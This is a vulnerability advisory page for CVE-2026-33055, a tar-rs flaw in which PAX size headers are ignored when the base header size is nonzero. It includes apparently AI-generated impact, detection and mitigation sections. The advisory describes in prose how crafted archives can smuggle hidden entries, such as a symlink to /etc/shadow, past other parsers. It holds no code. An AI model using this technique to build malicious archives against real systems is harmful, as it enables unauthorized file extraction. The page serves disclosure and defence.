CVE-2026-33055
Received Received - Intake
Inconsistent Tar Header Size Validation in tar-rs Library

Publication date: 2026-03-20

Last updated on: 2026-03-23

Assigner: GitHub, Inc.

Description
tar-rs is a tar archive reading/writing library for Rust. Versions 0.4.44 and below have conditional logic that skips the PAX size header in cases where the base header size is nonzero. As part of CVE-2025-62518, the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header. This is almost the inverse of the astral-tokio-tar issue. Any discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers. In this case, the tar-rs (Rust tar) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go archive/tar) unconditionally use the PAX size override. This can affect anything that uses the tar crate to parse archives and expects to have a consistent view with other parsers. This issue has been fixed in version 0.4.45.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-20
Last Modified
2026-03-23
Generated
2026-06-16
AI Q&A
2026-03-20
EPSS Evaluated
2026-06-15
NVD
CVE-2026-33055
EUVD
EUVD-2026-13596
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
alexcrichton tar-rs to 0.4.45 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-843 The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-33055 is a vulnerability in the Rust tar crate (tar-rs) versions up to 0.4.44, caused by incorrect handling of PAX size headers in tar archives. Specifically, tar-rs only applies the PAX size override if the base header size is zero, ignoring it when the base header size is nonzero. This differs from other tar parsers, which always honor the PAX size override unconditionally.

This discrepancy allows attackers to craft tar archives that unpack differently depending on the parser used, potentially smuggling hidden files such as symlinks into archives. For example, a malicious archive can declare a large file size in the PAX header but a smaller size in the base header, causing tar-rs to expose hidden entries that other parsers would skip.

The issue was fixed in tar-rs version 0.4.45 by changing the logic to always honor the PAX size override regardless of the base header size.

Impact Analysis

[{'type': 'paragraph', 'content': 'This vulnerability can impact any software that uses the tar-rs crate to parse tar archives and expects consistent behavior with other tar parsers. Because tar-rs handles PAX size headers differently, maliciously crafted archives can smuggle hidden files such as symlinks or other unexpected file types that are exposed by tar-rs but ignored by other parsers.'}, {'type': 'paragraph', 'content': 'Such discrepancies can lead to security risks including bypassing security checks, unauthorized file extraction, or exposure of sensitive files. For example, a crafted archive could include a symlink to a sensitive file like "/etc/shadow" that is extracted only by tar-rs, potentially leading to privilege escalation or data leakage.'}, {'type': 'paragraph', 'content': 'The vulnerability affects environments where different tar parsers are used inconsistently, such as client-side tools using tar-rs and server-side tools using astral-tokio-tar, creating opportunities for archive smuggling attacks.'}] [1, 2]

Compliance Impact

I don't know

Detection Guidance

[{'type': 'paragraph', 'content': 'This vulnerability involves the tar-rs crate incorrectly handling PAX size headers in tar archives, which can be detected by analyzing tar archives for discrepancies between the base header size and the PAX size override.'}, {'type': 'paragraph', 'content': 'A practical detection approach is to create or obtain a proof-of-concept (PoC) tar archive that contains a PAX extended header with a size override differing from the base header size, including smuggled entries such as symlinks.'}, {'type': 'paragraph', 'content': "By unpacking such archives with tar-rs versions up to 0.4.44 and comparing the results with other tar parsers (e.g., astral-tokio-tar or Go's archive/tar), you can detect inconsistent unpacking behavior indicative of the vulnerability."}, {'type': 'paragraph', 'content': 'While no specific commands are provided in the resources, you can use Rust tooling to run tests or scripts that parse suspicious tar archives using tar-rs versions <= 0.4.44 and observe if smuggled entries are exposed.'}] [1, 2]

Mitigation Strategies

The immediate mitigation step is to upgrade the tar-rs crate to version 0.4.45 or later, where the vulnerability has been fixed by changing the parsing logic to unconditionally honor the PAX size override.

This update ensures consistent handling of PAX size headers across tar parsers and prevents malicious tar archives from smuggling unauthorized entries.

Additionally, review any software or systems that rely on tar-rs for archive parsing and ensure they are updated accordingly to avoid exposure to this issue.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-33055. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart